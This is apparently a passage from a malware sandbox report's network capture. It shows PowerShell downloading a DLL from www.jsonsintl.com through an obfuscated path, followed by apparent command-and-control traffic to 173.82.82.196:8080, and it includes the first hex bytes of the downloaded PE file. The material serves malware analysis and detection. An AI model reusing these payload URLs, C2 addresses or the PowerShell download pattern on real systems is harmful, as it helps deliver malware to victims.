                                                                                                                                          May 23, 2022 04:12:15.863154888 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.864413977 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.864471912 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.864576101 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.867481947 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.867525101 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.867563009 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.867603064 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.867608070 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869158030 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869215012 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869261026 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869285107 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869332075 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869380951 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869425058 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869467020 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869505882 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869520903 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869546890 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869554043 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869585991 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869607925 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869625092 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869663954 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869703054 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869719982 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869743109 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869784117 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869812012 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869822025 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869832039 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869862080 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869900942 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869915009 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.869940042 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.869982958 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870004892 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870022058 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870063066 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870104074 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870119095 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870141983 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870182037 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870198011 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870220900 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870237112 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870260954 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870301008 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870316982 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870341063 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870381117 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870394945 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870421886 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870460033 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870498896 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870513916 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870537996 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870575905 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870594025 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870615959 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870628119 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870656013 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870695114 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870714903 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.870737076 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.870794058 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.990885019 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.990941048 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.990986109 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.991027117 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.991168022 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.991213083 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.992346048 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.992402077 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.992511988 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.995253086 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.995296955 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.995383978 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.998406887 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.998450994 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.998491049 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.998528957 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:15.998538971 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:15.998966932 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000372887 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000417948 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000459909 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000498056 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000530958 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000574112 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000617981 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000650883 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000659943 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000701904 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000734091 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000744104 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000783920 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000790119 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000853062 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000893116 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000914097 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000931025 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.000953913 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.000972033 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001013994 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001054049 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001068115 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001094103 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001132011 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001168966 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001172066 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001180887 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001211882 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001250029 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001271009 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001290083 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001327991 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001343966 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001367092 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001409054 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001436949 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001451969 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001492023 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001528978 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001530886 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001571894 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001586914 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001612902 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001652002 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001693010 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001703978 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001733065 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001771927 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001787901 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001812935 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001825094 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.001852989 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.001908064 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.119369030 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119434118 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119472980 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119513988 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119555950 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119558096 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.119594097 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119630098 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.119635105 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119676113 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119703054 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.119714022 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119755030 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119776964 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.119826078 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.119846106 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119889021 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119927883 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119967937 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.119982958 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120012045 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120044947 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120050907 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120090008 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120115995 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120129108 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120168924 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120208979 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120222092 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120246887 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120269060 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120286942 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120326996 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120363951 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120394945 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120403051 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120441914 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120469093 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120528936 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120568991 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120574951 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120608091 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120649099 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120687008 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120688915 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120728970 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120740891 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120767117 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120803118 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120806932 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120846987 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120884895 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120915890 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.120923996 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120963097 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.120968103 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121007919 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121047020 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121048927 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121087074 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121126890 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121166945 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121174097 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121203899 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121225119 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121243000 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121280909 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121294975 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121321917 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121362925 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121370077 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121401072 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121442080 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121483088 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121485949 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121520042 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121558905 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121561050 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121599913 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121615887 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121639967 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121680975 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.121685028 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.121764898 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.123213053 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.123253107 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.123294115 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.123327017 CEST804974198.142.105.106192.168.2.3
                                                                                                                                          May 23, 2022 04:12:16.123353004 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:16.123404026 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:20.471477985 CEST4974180192.168.2.398.142.105.106
                                                                                                                                          May 23, 2022 04:12:48.172173977 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:48.345619917 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:48.345921040 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:48.392406940 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:48.565752983 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:48.583476067 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:48.583511114 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:48.583604097 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:50.878897905 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:51.052205086 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:51.053504944 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:51.053601980 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:51.060189962 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:51.233470917 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:51.990636110 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:51.991631031 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          May 23, 2022 04:12:54.991765976 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:54.991816044 CEST808049752173.82.82.196192.168.2.3
                                                                                                                                          May 23, 2022 04:12:54.993581057 CEST497528080192.168.2.3173.82.82.196
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          May 23, 2022 04:12:14.649113894 CEST6485153192.168.2.38.8.8.8
                                                                                                                                          May 23, 2022 04:12:14.787208080 CEST53648518.8.8.8192.168.2.3
                                                                                                                                          May 23, 2022 04:12:14.801043987 CEST4931653192.168.2.38.8.8.8
                                                                                                                                          May 23, 2022 04:12:14.939541101 CEST53493168.8.8.8192.168.2.3
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                          May 23, 2022 04:12:14.649113894 CEST192.168.2.38.8.8.80x536cStandard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                                                                                                                          May 23, 2022 04:12:14.801043987 CEST192.168.2.38.8.8.80x9fdfStandard query (0)www.jsonsintl.comA (IP address)IN (0x0001)
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                          May 23, 2022 04:12:14.787208080 CEST8.8.8.8192.168.2.30x536cNo error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                          May 23, 2022 04:12:14.787208080 CEST8.8.8.8192.168.2.30x536cNo error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                                                                                                                          May 23, 2022 04:12:14.939541101 CEST8.8.8.8192.168.2.30x9fdfNo error (0)www.jsonsintl.comjsonsintl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                          May 23, 2022 04:12:14.939541101 CEST8.8.8.8192.168.2.30x9fdfNo error (0)jsonsintl.com98.142.105.106A (IP address)IN (0x0001)
                                                                                                                                          • www.jsonsintl.com
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          0192.168.2.34974198.142.105.10680C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          May 23, 2022 04:12:15.083039045 CEST1129OUTGET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                          Host: www.jsonsintl.com
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          May 23, 2022 04:12:15.349484921 CEST1130INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 23 May 2022 02:12:15 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          X-Powered-By: PHP/5.6.40
                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Mon, 23 May 2022 02:12:15 GMT
                                                                                                                                          Content-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"
                                                                                                                                          Content-Transfer-Encoding: binary
                                                                                                                                          Set-Cookie: 628aed7f4404a=1653271935; expires=Mon, 23-May-2022 02:13:15 GMT; Max-Age=60; path=/
                                                                                                                                          Last-Modified: Mon, 23 May 2022 02:12:15 GMT
                                                                                                                                          Content-Length: 365056
                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                          Keep-Alive: timeout=5, max=40
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40
